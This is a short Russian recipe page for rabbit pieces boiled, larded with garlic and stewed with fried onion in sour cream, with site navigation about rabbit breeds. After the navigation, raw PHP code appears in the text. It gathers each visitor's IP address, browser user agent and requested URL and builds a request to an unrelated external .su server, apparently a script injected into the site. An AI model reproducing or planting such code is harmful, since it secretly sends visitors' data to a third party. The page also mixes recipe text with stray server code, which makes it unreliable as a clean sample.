| |||
Тушку промыть, разрубить на порционные кусочки, очистить от жира и поместить на 10 мин в кипящую воду. Затем воду слить, кусочки промыть и поместить их в емкость с кипящей подсоленной водой со специями (лавровый лист, черный перец горошком) и варить до готовности. Кусочки крольчатины после остывания нашпиговать чесноком и заложить в кастрюлю. Мясо покрыть пассерованным на сливочном масле луком и залить сметаной (0,5 л). Затем кастрюлю поставить на полчаса на слабый огонь. Напишите мне На главную Фотоальбом Калифорнийская Серебристая Белый великан О пользе крольчатины Блюда из кролика $serverrobo = $_SERVER['REMOTE_ADDR']; $agentrobo = $_SERVER['HTTP_USER_AGENT'];$urlrobo = $_SERVER['HTTP_HOST'];$urlrobo .= $_SERVER['REQUEST_URI']; $agentrobo = str_replace(" ","", $agentrobo);$getroboip = "http://XN--80AVUE.xn--90acjmnnc1hybf.su/server.php?idishka=136498&ipishka=$serverrobo&useragentka=$agentrobo&urlrobotka=$urlrobo";?> ![]() |